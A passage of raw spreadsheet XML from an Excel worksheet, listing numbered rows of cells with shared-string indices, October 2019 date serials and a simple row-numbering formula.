        <f t="shared" si="226"/>
        <v>14493</v>
      </c>
      <c r="B14494">
        <v>4493</v>
      </c>
      <c r="C14494" t="s">
        <v>19637</v>
      </c>
      <c r="D14494" s="1">
        <v>43753</v>
      </c>
      <c r="E14494" t="s">
        <v>19680</v>
      </c>
      <c r="F14494" t="s">
        <v>10021</v>
      </c>
      <c r="G14494" t="s">
        <v>24949</v>
      </c>
    </row>
    <row r="14495" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14495">
        <f t="shared" si="226"/>
        <v>14494</v>
      </c>
      <c r="B14495">
        <v>4494</v>
      </c>
      <c r="C14495" t="s">
        <v>19637</v>
      </c>
      <c r="D14495" s="1">
        <v>43746</v>
      </c>
      <c r="E14495" t="s">
        <v>19717</v>
      </c>
      <c r="F14495" t="s">
        <v>10526</v>
      </c>
      <c r="G14495" t="s">
        <v>24950</v>
      </c>
    </row>
    <row r="14496" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14496">
        <f t="shared" si="226"/>
        <v>14495</v>
      </c>
      <c r="B14496">
        <v>4495</v>
      </c>
      <c r="C14496" t="s">
        <v>19637</v>
      </c>
      <c r="D14496" s="1">
        <v>43739</v>
      </c>
      <c r="E14496" t="s">
        <v>19849</v>
      </c>
      <c r="F14496" t="s">
        <v>10021</v>
      </c>
      <c r="G14496" t="s">
        <v>24951</v>
      </c>
    </row>
    <row r="14497" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14497">
        <f t="shared" si="226"/>
        <v>14496</v>
      </c>
      <c r="B14497">
        <v>4496</v>
      </c>
      <c r="C14497" t="s">
        <v>19637</v>
      </c>
      <c r="D14497" s="1">
        <v>43747</v>
      </c>
      <c r="F14497" t="s">
        <v>10526</v>
      </c>
      <c r="G14497" t="s">
        <v>24952</v>
      </c>
    </row>
    <row r="14498" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14498">
        <f t="shared" si="226"/>
        <v>14497</v>
      </c>
      <c r="B14498">
        <v>4497</v>
      </c>
      <c r="C14498" t="s">
        <v>19637</v>
      </c>
      <c r="D14498" s="1">
        <v>43746</v>
      </c>
      <c r="F14498" t="s">
        <v>10526</v>
      </c>
      <c r="G14498" t="s">
        <v>24953</v>
      </c>
    </row>
    <row r="14499" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14499">
        <f t="shared" si="226"/>
        <v>14498</v>
      </c>
      <c r="B14499">
        <v>4498</v>
      </c>
      <c r="C14499" t="s">
        <v>19637</v>
      </c>
      <c r="D14499" s="1">
        <v>43748</v>
      </c>
      <c r="E14499" t="s">
        <v>21485</v>
      </c>
      <c r="F14499" t="s">
        <v>10526</v>
      </c>
      <c r="G14499" t="s">
        <v>24954</v>
      </c>
    </row>
    <row r="14500" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14500">
        <f t="shared" si="226"/>
        <v>14499</v>
      </c>
      <c r="B14500">
        <v>4499</v>
      </c>
      <c r="C14500" t="s">
        <v>19637</v>
      </c>
      <c r="D14500" s="1">
        <v>43748</v>
      </c>
      <c r="E14500" t="s">
        <v>20995</v>
      </c>
      <c r="F14500" t="s">
        <v>9975</v>
      </c>
      <c r="G14500" t="s">
        <v>24955</v>
      </c>
    </row>
    <row r="14501" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14501">
        <f t="shared" si="226"/>
        <v>14500</v>
      </c>
      <c r="B14501">
        <v>4500</v>
      </c>
      <c r="C14501" t="s">
        <v>19637</v>
      </c>
      <c r="D14501" s="1">
        <v>43744</v>
      </c>
      <c r="E14501" t="s">
        <v>19640</v>
      </c>
      <c r="F14501" t="s">
        <v>10021</v>
      </c>
      <c r="G14501" t="s">
        <v>24956</v>
      </c>
    </row>
    <row r="14502" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14502">
        <f t="shared" si="226"/>
        <v>14501</v>
      </c>
      <c r="B14502">
        <v>4501</v>
      </c>
      <c r="C14502" t="s">
        <v>19637</v>
      </c>
      <c r="D14502" s="1">
        <v>43753</v>
      </c>
      <c r="E14502" t="s">
        <v>20005</v>
      </c>
      <c r="F14502" t="s">
        <v>9975</v>
      </c>
      <c r="G14502" t="s">
        <v>24957</v>
      </c>
    </row>
    <row r="14503" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14503">
        <f t="shared" si="226"/>
        <v>14502</v>
      </c>
      <c r="B14503">
        <v>4502</v>
      </c>
      <c r="C14503" t="s">
        <v>19637</v>
      </c>
      <c r="D14503" s="1">
        <v>43740</v>
      </c>
      <c r="E14503" t="s">
        <v>19982</v>
      </c>
      <c r="F14503" t="s">
        <v>9978</v>
      </c>
      <c r="G14503" t="s">
        <v>24958</v>
      </c>
    </row>
    <row r="14504" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14504">
        <f t="shared" si="226"/>
        <v>14503</v>
      </c>
      <c r="B14504">
        <v>4503</v>
      </c>
      <c r="C14504" t="s">
        <v>19637</v>
      </c>
      <c r="D14504" s="1">
        <v>43757</v>
      </c>
      <c r="E14504" t="s">
        <v>19663</v>
      </c>
      <c r="F14504" t="s">
        <v>9975</v>
      </c>
      <c r="G14504" t="s">
        <v>24959</v>
      </c>
    </row>
    <row r="14505" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14505">
        <f t="shared" si="226"/>
        <v>14504</v>
      </c>
      <c r="B14505">
        <v>4504</v>
      </c>
      <c r="C14505" t="s">
        <v>19637</v>
      </c>
      <c r="D14505" s="1">
        <v>43756</v>
      </c>
      <c r="E14505" t="s">
        <v>24960</v>
      </c>
      <c r="F14505" t="s">
        <v>10526</v>
      </c>
      <c r="G14505" t="s">
        <v>24961</v>
      </c>
    </row>
    <row r="14506" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14506">
        <f t="shared" si="226"/>
        <v>14505</v>
      </c>
      <c r="B14506">
        <v>4505</v>
      </c>
      <c r="C14506" t="s">
        <v>19637</v>
      </c>
      <c r="D14506" s="1">
        <v>43739</v>
      </c>
      <c r="E14506" t="s">
        <v>19717</v>
      </c>
      <c r="F14506" t="s">
        <v>10526</v>
      </c>
      <c r="G14506" t="s">
        <v>24962</v>
      </c>
    </row>
    <row r="14507" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14507">
        <f t="shared" si="226"/>
        <v>14506</v>
      </c>
      <c r="B14507">
        <v>4506</v>
      </c>
      <c r="C14507" t="s">
        <v>19637</v>
      </c>
      <c r="D14507" s="1">
        <v>43740</v>
      </c>
      <c r="E14507" t="s">
        <v>22557</v>
      </c>
      <c r="F14507" t="s">
        <v>10526</v>
      </c>
      <c r="G14507" t="s">
        <v>24963</v>
      </c>
    </row>
    <row r="14508" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14508">
        <f t="shared" si="226"/>
        <v>14507</v>
      </c>
      <c r="B14508">
        <v>4507</v>
      </c>
      <c r="C14508" t="s">
        <v>19637</v>
      </c>
      <c r="D14508" s="1">
        <v>43755</v>
      </c>
      <c r="E14508" t="s">
        <v>23502</v>
      </c>
      <c r="F14508" t="s">
        <v>9978</v>
      </c>
      <c r="G14508" t="s">
        <v>24964</v>
      </c>
    </row>
    <row r="14509" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14509">
        <f t="shared" si="226"/>
        <v>14508</v>
      </c>
      <c r="B14509">
        <v>4508</v>
      </c>
      <c r="C14509" t="s">
        <v>19637</v>
      </c>
      <c r="D14509" s="1">
        <v>43742</v>
      </c>
      <c r="F14509" t="s">
        <v>10526</v>
      </c>
      <c r="G14509" t="s">
        <v>24965</v>
      </c>
    </row>
    <row r="14510" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14510">
        <f t="shared" si="226"/>
        <v>14509</v>
      </c>
      <c r="B14510">
        <v>4509</v>
      </c>
      <c r="C14510" t="s">
        <v>19637</v>
      </c>
      <c r="D14510" s="1">
        <v>43753</v>
      </c>
      <c r="E14510" t="s">
        <v>20532</v>
      </c>
      <c r="F14510" t="s">
        <v>10021</v>
      </c>
      <c r="G14510" t="s">
        <v>24966</v>
      </c>
    </row>
    <row r="14511" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14511">
        <f t="shared" si="226"/>
        <v>14510</v>
      </c>
      <c r="B14511">
        <v>4510</v>
      </c>
      <c r="C14511" t="s">
        <v>19637</v>
      </c>
      <c r="D14511" s="1">
        <v>43753</v>
      </c>
      <c r="E14511" t="s">
        <v>19640</v>
      </c>
      <c r="F14511" t="s">
        <v>9975</v>
      </c>
      <c r="G14511" t="s">
        <v>24967</v>
      </c>
    </row>
    <row r="14512" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14512">
        <f t="shared" si="226"/>
        <v>14511</v>
      </c>
      <c r="B14512">
        <v>4511</v>
      </c>
      <c r="C14512" t="s">
        <v>19637</v>
      </c>
      <c r="D14512" s="1">
        <v>43743</v>
      </c>
      <c r="E14512" t="s">
        <v>19643</v>
      </c>
      <c r="F14512" t="s">
        <v>10021</v>
      </c>
      <c r="G14512" t="s">
        <v>24968</v>
      </c>
    </row>
    <row r="14513" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14513">
        <f t="shared" si="226"/>
        <v>14512</v>
      </c>
      <c r="B14513">
        <v>4512</v>
      </c>
      <c r="C14513" t="s">
        <v>19637</v>
      </c>
      <c r="D14513" s="1">
        <v>43745</v>
      </c>
      <c r="E14513" t="s">
        <v>19640</v>
      </c>
      <c r="F14513" t="s">
        <v>9975</v>
      </c>
      <c r="G14513" t="s">
        <v>24969</v>
      </c>
    </row>
    <row r="14514" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14514">
        <f t="shared" si="226"/>
        <v>14513</v>
      </c>
      <c r="B14514">
        <v>4513</v>
      </c>
      <c r="C14514" t="s">
        <v>19637</v>
      </c>
      <c r="D14514" s="1">
        <v>43755</v>
      </c>
      <c r="E14514" t="s">
        <v>19750</v>
      </c>
      <c r="F14514" t="s">
        <v>9978</v>
      </c>
      <c r="G14514" t="s">
        <v>24970</v>
      </c>
    </row>
    <row r="14515" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14515">
        <f t="shared" si="226"/>
        <v>14514</v>
      </c>
      <c r="B14515">
        <v>4514</v>
      </c>
      <c r="C14515" t="s">
        <v>19637</v>
      </c>
      <c r="D14515" s="1">
        <v>43751</v>
      </c>
      <c r="F14515" t="s">
        <v>10526</v>
      </c>
      <c r="G14515" t="s">
        <v>24971</v>
      </c>
    </row>
    <row r="14516" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14516">
        <f t="shared" si="226"/>
        <v>14515</v>
      </c>
      <c r="B14516">
        <v>4515</v>
      </c>
      <c r="C14516" t="s">
        <v>19637</v>
      </c>
      <c r="D14516" s="1">
        <v>43749</v>
      </c>
      <c r="E14516" t="s">
        <v>19952</v>
      </c>
      <c r="F14516" t="s">
        <v>9978</v>
      </c>
      <c r="G14516" t="s">
        <v>24972</v>
      </c>
    </row>
    <row r="14517" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14517">
        <f t="shared" si="226"/>
        <v>14516</v>
      </c>
      <c r="B14517">
        <v>4516</v>
      </c>
      <c r="C14517" t="s">
        <v>19637</v>
      </c>
      <c r="D14517" s="1">
        <v>43746</v>
      </c>
      <c r="E14517" t="s">
        <v>19643</v>
      </c>
      <c r="F14517" t="s">
        <v>10021</v>
      </c>
      <c r="G14517" t="s">
        <v>24973</v>
      </c>
    </row>
    <row r="14518" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14518">
        <f t="shared" si="226"/>
        <v>14517</v>
      </c>
      <c r="B14518">
        <v>4517</v>
      </c>
      <c r="C14518" t="s">
        <v>19637</v>
      </c>
      <c r="D14518" s="1">
        <v>43756</v>
      </c>
      <c r="E14518" t="s">
        <v>21939</v>
      </c>
      <c r="F14518" t="s">
        <v>9978</v>
      </c>
      <c r="G14518" t="s">
        <v>24974</v>
      </c>
    </row>
    <row r="14519" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14519">
        <f t="shared" si="226"/>
        <v>14518</v>
      </c>
      <c r="B14519">
        <v>4518</v>
      </c>
      <c r="C14519" t="s">
        <v>19637</v>
      </c>
      <c r="D14519" s="1">
        <v>43752</v>
      </c>
      <c r="F14519" t="s">
        <v>10526</v>
      </c>
      <c r="G14519" t="s">
        <v>24975</v>
      </c>
    </row>
    <row r="14520" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14520">
        <f t="shared" si="226"/>
        <v>14519</v>
      </c>
      <c r="B14520">
        <v>4519</v>
      </c>
      <c r="C14520" t="s">
        <v>19637</v>
      </c>
      <c r="D14520" s="1">
        <v>43746</v>
      </c>
      <c r="E14520" t="s">
        <v>20421</v>
      </c>
      <c r="F14520" t="s">
        <v>10021</v>
      </c>
      <c r="G14520" t="s">
        <v>24976</v>
      </c>
    </row>
    <row r="14521" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14521">
        <f t="shared" si="226"/>
        <v>14520</v>
      </c>
      <c r="B14521">
        <v>4520</v>
      </c>
      <c r="C14521" t="s">
        <v>19637</v>
      </c>
      <c r="D14521" s="1">
        <v>43739</v>
      </c>
      <c r="E14521" t="s">
        <v>19663</v>
      </c>
      <c r="F14521" t="s">
        <v>9975</v>
      </c>
      <c r="G14521" t="s">
        <v>24977</v>
      </c>
    </row>
    <row r="14522" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14522">
        <f t="shared" si="226"/>
        <v>14521</v>
      </c>
      <c r="B14522">
        <v>4521</v>
      </c>
      <c r="C14522" t="s">
        <v>19637</v>
      </c>
      <c r="D14522" s="1">
        <v>43746</v>
      </c>
      <c r="E14522" t="s">
        <v>19640</v>
      </c>
      <c r="F14522" t="s">
        <v>9975</v>
      </c>
      <c r="G14522" t="s">
        <v>24978</v>
      </c>
    </row>
    <row r="14523" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14523">
        <f t="shared" si="226"/>
        <v>14522</v>
      </c>
      <c r="B14523">
        <v>4522</v>
      </c>
      <c r="C14523" t="s">
        <v>19637</v>
      </c>
      <c r="D14523" s="1">
        <v>43746</v>
      </c>
      <c r="E14523" t="s">
        <v>24195</v>
      </c>
      <c r="F14523" t="s">
        <v>10526</v>
      </c>
      <c r="G14523" t="s">
        <v>24979</v>
      </c>
    </row>
    <row r="14524" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14524">
        <f t="shared" si="226"/>
        <v>14523</v>
      </c>
      <c r="B14524">
        <v>4523</v>
      </c>
      <c r="C14524" t="s">
        <v>19637</v>
      </c>
      <c r="D14524" s="1">
        <v>43749</v>
      </c>
      <c r="F14524" t="s">
        <v>10526</v>
      </c>
      <c r="G14524" t="s">
        <v>24980</v>
      </c>
    </row>
    <row r="14525" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14525">
        <f t="shared" si="226"/>
        <v>14524</v>
      </c>
      <c r="B14525">
        <v>4524</v>
      </c>
      <c r="C14525" t="s">
        <v>19637</v>
      </c>
      <c r="D14525" s="1">
        <v>43754</v>
      </c>
      <c r="E14525" t="s">
        <v>24981</v>
      </c>
      <c r="F14525" t="s">
        <v>10526</v>
      </c>
      <c r="G14525" t="s">
        <v>24982</v>
      </c>
    </row>
    <row r="14526" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14526">
        <f t="shared" si="226"/>
        <v>14525</v>
      </c>
      <c r="B14526">
        <v>4525</v>
      </c>
      <c r="C14526" t="s">
        <v>19637</v>
      </c>
      <c r="D14526" s="1">
        <v>43748</v>
      </c>
      <c r="E14526" t="s">
        <v>20677</v>
      </c>
      <c r="F14526" t="s">
        <v>10526</v>
      </c>
      <c r="G14526" t="s">
        <v>24983</v>
      </c>
    </row>
    <row r="14527" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14527">
        <f t="shared" si="226"/>
        <v>14526</v>
      </c>
      <c r="B14527">
        <v>4526</v>
      </c>
      <c r="C14527" t="s">
        <v>19637</v>
      </c>
      <c r="D14527" s="1">
        <v>43755</v>
      </c>
      <c r="E14527" t="s">
        <v>24984</v>
      </c>
      <c r="F14527" t="s">
        <v>9978</v>
      </c>
      <c r="G14527" t="s">
        <v>24985</v>
      </c>
    </row>
    <row r="14528" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14528">
        <f t="shared" si="226"/>
        <v>14527</v>
      </c>
      <c r="B14528">
        <v>4527</v>
      </c>
      <c r="C14528" t="s">
        <v>19637</v>
      </c>
      <c r="D14528" s="1">
        <v>43755</v>
      </c>
      <c r="E14528" t="s">
        <v>24986</v>
      </c>
      <c r="F14528" t="s">
        <v>10021</v>
      </c>
      <c r="G14528" t="s">
        <v>24987</v>
      </c>
    </row>
    <row r="14529" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14529">
        <f t="shared" si="226"/>
        <v>14528</v>
      </c>
      <c r="B14529">
        <v>4528</v>
      </c>
      <c r="C14529" t="s">
        <v>19637</v>
      </c>
      <c r="D14529" s="1">
        <v>43740</v>
      </c>
      <c r="F14529" t="s">
        <v>10526</v>
      </c>
      <c r="G14529" t="s">
        <v>24988</v>
      </c>
    </row>
    <row r="14530" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14530">
        <f t="shared" si="226"/>
        <v>14529</v>
      </c>
      <c r="B14530">
        <v>4529</v>
      </c>
      <c r="C14530" t="s">
        <v>19637</v>
      </c>
      <c r="D14530" s="1">
        <v>43744</v>
      </c>
      <c r="E14530" t="s">
        <v>19640</v>
      </c>
      <c r="F14530" t="s">
        <v>9975</v>
      </c>
      <c r="G14530" t="s">
        <v>24989</v>
      </c>
    </row>
    <row r="14531" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14531">
        <f t="shared" ref="A14531:A14594" si="227">+ROW(A14530)</f>
        <v>14530</v>
      </c>
      <c r="B14531">
        <v>4530</v>
      </c>
      <c r="C14531" t="s">
        <v>19637</v>
      </c>
      <c r="D14531" s="1">
        <v>43756</v>
      </c>
      <c r="F14531" t="s">
        <v>10526</v>
      </c>
      <c r="G14531" t="s">
        <v>22281</v>
      </c>
    </row>
    <row r="14532" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14532">
        <f t="shared" si="227"/>
        <v>14531</v>
      </c>
      <c r="B14532">
        <v>4531</v>
      </c>
      <c r="C14532" t="s">
        <v>19637</v>
      </c>
      <c r="D14532" s="1">
        <v>43755</v>
      </c>
      <c r="E14532" t="s">
        <v>19717</v>
      </c>
      <c r="F14532" t="s">
        <v>10526</v>
      </c>
      <c r="G14532" t="s">
        <v>24990</v>
      </c>
    </row>
    <row r="14533" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14533">
        <f t="shared" si="227"/>
        <v>14532</v>
      </c>
      <c r="B14533">
        <v>4532</v>
      </c>
      <c r="C14533" t="s">
        <v>19637</v>
      </c>
      <c r="D14533" s="1">
        <v>43757</v>
      </c>
      <c r="F14533" t="s">
        <v>10526</v>
      </c>
      <c r="G14533" t="s">
        <v>24557</v>
      </c>
    </row>
    <row r="14534" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14534">
        <f t="shared" si="227"/>
        <v>14533</v>
      </c>
      <c r="B14534">
        <v>4533</v>
      </c>
      <c r="C14534" t="s">
        <v>19637</v>
      </c>
      <c r="D14534" s="1">
        <v>43749</v>
      </c>
      <c r="E14534" t="s">
        <v>23316</v>
      </c>
      <c r="F14534" t="s">
        <v>10021</v>
      </c>
      <c r="G14534" t="s">
        <v>24991</v>
      </c>
    </row>
    <row r="14535" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14535">
        <f t="shared" si="227"/>
        <v>14534</v>
      </c>
      <c r="B14535">
        <v>4534</v>
      </c>
      <c r="C14535" t="s">
        <v>19637</v>
      </c>
      <c r="D14535" s="1">
        <v>43745</v>
      </c>
      <c r="E14535" t="s">
        <v>19896</v>
      </c>
      <c r="F14535" t="s">
        <v>10021</v>
      </c>
      <c r="G14535" t="s">
        <v>24992</v>
      </c>
    </row>
    <row r="14536" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14536">
        <f t="shared" si="227"/>
        <v>14535</v>
      </c>
      <c r="B14536">
        <v>4535</v>
      </c>
      <c r="C14536" t="s">
        <v>19637</v>
      </c>
      <c r="D14536" s="1">
        <v>43754</v>
      </c>
      <c r="F14536" t="s">
        <v>10526</v>
      </c>
      <c r="G14536" t="s">
        <v>24993</v>
      </c>
    </row>
    <row r="14537" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14537">
        <f t="shared" si="227"/>
        <v>14536</v>
      </c>
      <c r="B14537">
        <v>4536</v>
      </c>
      <c r="C14537" t="s">
        <v>19637</v>
      </c>
      <c r="D14537" s="1">
        <v>43754</v>
      </c>
      <c r="E14537" t="s">
        <v>24994</v>
      </c>
      <c r="F14537" t="s">
        <v>10021</v>
      </c>
      <c r="G14537" t="s">
        <v>24995</v>
      </c>
    </row>
    <row r="14538" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14538">
        <f t="shared" si="227"/>
        <v>14537</v>
      </c>
      <c r="B14538">
        <v>4537</v>
      </c>
      <c r="C14538" t="s">
        <v>19637</v>
      </c>
      <c r="D14538" s="1">
        <v>43744</v>
      </c>
      <c r="E14538" t="s">
        <v>19750</v>
      </c>
      <c r="F14538" t="s">
        <v>9978</v>
      </c>
      <c r="G14538" t="s">
        <v>24996</v>
      </c>
    </row>
    <row r="14539" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14539">
        <f t="shared" si="227"/>
        <v>14538</v>
      </c>
      <c r="B14539">
        <v>4538</v>
      </c>
      <c r="C14539" t="s">
        <v>19637</v>
      </c>
      <c r="D14539" s="1">
        <v>43752</v>
      </c>
      <c r="E14539" t="s">
        <v>19638</v>
      </c>
      <c r="F14539" t="s">
        <v>10021</v>
      </c>
      <c r="G14539" t="s">
        <v>24997</v>
      </c>
    </row>
    <row r="14540" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14540">
        <f t="shared" si="227"/>
        <v>14539</v>
      </c>
      <c r="B14540">
        <v>4539</v>
      </c>
      <c r="C14540" t="s">
        <v>19637</v>
      </c>
      <c r="D14540" s="1">
        <v>43753</v>
      </c>
      <c r="E14540" t="s">
        <v>19705</v>
      </c>
      <c r="F14540" t="s">
        <v>10021</v>
      </c>
      <c r="G14540" t="s">
        <v>24998</v>
      </c>
    </row>
    <row r="14541" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14541">
        <f t="shared" si="227"/>
        <v>14540</v>
      </c>
      <c r="B14541">
        <v>4540</v>
      </c>
      <c r="C14541" t="s">
        <v>19637</v>
      </c>
      <c r="D14541" s="1">
        <v>43740</v>
      </c>
      <c r="E14541" t="s">
        <v>19650</v>
      </c>
      <c r="F14541" t="s">
        <v>10021</v>
      </c>
      <c r="G14541" t="s">
        <v>24999</v>
      </c>
    </row>
    <row r="14542" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14542">
        <f t="shared" si="227"/>
        <v>14541</v>
      </c>
      <c r="B14542">
        <v>4541</v>
      </c>
      <c r="C14542" t="s">
        <v>19637</v>
      </c>
      <c r="D14542" s="1">
        <v>43754</v>
      </c>
      <c r="E14542" t="s">
        <v>21160</v>
      </c>
      <c r="F14542" t="s">
        <v>10021</v>
      </c>
      <c r="G14542" t="s">
        <v>25000</v>
      </c>
    </row>
    <row r="14543" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14543">
        <f t="shared" si="227"/>
        <v>14542</v>
      </c>
      <c r="B14543">
        <v>4542</v>
      </c>
      <c r="C14543" t="s">
        <v>19637</v>
      </c>
      <c r="D14543" s="1">
        <v>43744</v>
      </c>
      <c r="E14543" t="s">
        <v>19680</v>
      </c>
      <c r="F14543" t="s">
        <v>10021</v>
      </c>
      <c r="G14543" t="s">
        <v>25001</v>
      </c>
    </row>
    <row r="14544" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14544">
        <f t="shared" si="227"/>
        <v>14543</v>
      </c>
      <c r="B14544">
        <v>4543</v>
      </c>
      <c r="C14544" t="s">
        <v>19637</v>
      </c>
      <c r="D14544" s="1">
        <v>43748</v>
      </c>
      <c r="E14544" t="s">
        <v>25002</v>
      </c>
      <c r="F14544" t="s">
        <v>10526</v>
      </c>
      <c r="G14544" t="s">
        <v>25003</v>
      </c>
    </row>
    <row r="14545" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14545">
        <f t="shared" si="227"/>
        <v>14544</v>
      </c>
      <c r="B14545">
        <v>4544</v>
      </c>
      <c r="C14545" t="s">
        <v>19637</v>
      </c>
      <c r="D14545" s="1">
        <v>43755</v>
      </c>
      <c r="E14545" t="s">
        <v>20185</v>
      </c>
      <c r="F14545" t="s">
        <v>9975</v>
      </c>
      <c r="G14545" t="s">
        <v>25004</v>
      </c>
    </row>
    <row r="14546" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14546">
        <f t="shared" si="227"/>
        <v>14545</v>
      </c>
      <c r="B14546">
        <v>4545</v>
      </c>
      <c r="C14546" t="s">
        <v>19637</v>
      </c>
      <c r="D14546" s="1">
        <v>43747</v>
      </c>
      <c r="E14546" t="s">
        <v>19917</v>
      </c>
      <c r="F14546" t="s">
        <v>9975</v>
      </c>
      <c r="G14546" t="s">
        <v>25005</v>
      </c>
    </row>
    <row r="14547" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14547">
        <f t="shared" si="227"/>
        <v>14546</v>
      </c>
      <c r="B14547">
        <v>4546</v>
      </c>
      <c r="C14547" t="s">
        <v>19637</v>
      </c>
      <c r="D14547" s="1">
        <v>43750</v>
      </c>
      <c r="E14547" t="s">
        <v>21039</v>
      </c>
      <c r="F14547" t="s">
        <v>10021</v>
      </c>
      <c r="G14547" t="s">
        <v>25006</v>
      </c>
    </row>
    <row r="14548" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14548">
        <f t="shared" si="227"/>
        <v>14547</v>
      </c>
      <c r="B14548">
        <v>4547</v>
      </c>
      <c r="C14548" t="s">
        <v>19637</v>
      </c>
      <c r="D14548" s="1">
        <v>43752</v>
      </c>
      <c r="E14548" t="s">
        <v>19680</v>
      </c>
      <c r="F14548" t="s">
        <v>10021</v>
      </c>
      <c r="G14548" t="s">
        <v>25007</v>
      </c>
    </row>
    <row r="14549" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14549">
        <f t="shared" si="227"/>
        <v>14548</v>
      </c>
      <c r="B14549">
        <v>4548</v>
      </c>
      <c r="C14549" t="s">
        <v>19637</v>
      </c>
      <c r="D14549" s="1">
        <v>43746</v>
      </c>
      <c r="F14549" t="s">
        <v>10021</v>
      </c>
      <c r="G14549" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="14550" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14550">
        <f t="shared" si="227"/>
        <v>14549</v>
      </c>
      <c r="B14550">
        <v>4549</v>
      </c>
      <c r="C14550" t="s">
        <v>19637</v>
      </c>
      <c r="D14550" s="1">
        <v>43743</v>
      </c>
      <c r="E14550" t="s">
        <v>21124</v>
      </c>
      <c r="F14550" t="s">
        <v>10526</v>
      </c>
      <c r="G14550" t="s">
        <v>25008</v>
      </c>
    </row>
    <row r="14551" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14551">
        <f t="shared" si="227"/>
        <v>14550</v>
      </c>
      <c r="B14551">
        <v>4550</v>
      </c>
      <c r="C14551" t="s">
        <v>19637</v>
      </c>
      <c r="D14551" s="1">
        <v>43739</v>
      </c>
      <c r="E14551" t="s">
        <v>19640</v>
      </c>
      <c r="F14551" t="s">
        <v>9975</v>
      </c>
      <c r="G14551" t="s">
        <v>25009</v>
      </c>
    </row>
    <row r="14552" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14552">
        <f t="shared" si="227"/>
        <v>14551</v>
      </c>
      <c r="B14552">
        <v>4551</v>
      </c>
      <c r="C14552" t="s">
        <v>19637</v>
      </c>
      <c r="D14552" s="1">
        <v>43753</v>
      </c>
      <c r="E14552" t="s">
        <v>19843</v>
      </c>
      <c r="F14552" t="s">
        <v>10526</v>
      </c>
      <c r="G14552" t="s">
        <v>25010</v>
      </c>
    </row>
    <row r="14553" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14553">
        <f t="shared" si="227"/>
        <v>14552</v>
      </c>
      <c r="B14553">
        <v>4552</v>
      </c>
      <c r="C14553" t="s">
        <v>19637</v>
      </c>
      <c r="D14553" s="1">
        <v>43739</v>
      </c>
      <c r="E14553" t="s">
        <v>22546</v>
      </c>
      <c r="F14553" t="s">
        <v>9975</v>
      </c>
      <c r="G14553" t="s">
        <v>25011</v>
      </c>
    </row>
    <row r="14554" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14554">
        <f t="shared" si="227"/>
        <v>14553</v>
      </c>
      <c r="B14554">
        <v>4553</v>
      </c>
      <c r="C14554" t="s">
        <v>19637</v>
      </c>
      <c r="D14554" s="1">
        <v>43752</v>
      </c>
      <c r="F14554" t="s">
        <v>10526</v>
      </c>
      <c r="G14554" t="s">
        <v>25012</v>
      </c>
    </row>
    <row r="14555" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14555">
        <f t="shared" si="227"/>
        <v>14554</v>
      </c>
      <c r="B14555">
        <v>4554</v>
      </c>
      <c r="C14555" t="s">
        <v>19637</v>
      </c>
      <c r="D14555" s="1">
        <v>43739</v>
      </c>
      <c r="E14555" t="s">
        <v>19640</v>
      </c>
      <c r="F14555" t="s">
        <v>10021</v>
      </c>
      <c r="G14555" t="s">
        <v>25013</v>
      </c>
    </row>
    <row r="14556" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14556">
        <f t="shared" si="227"/>
        <v>14555</v>
      </c>
      <c r="B14556">
        <v>4555</v>
      </c>
      <c r="C14556" t="s">
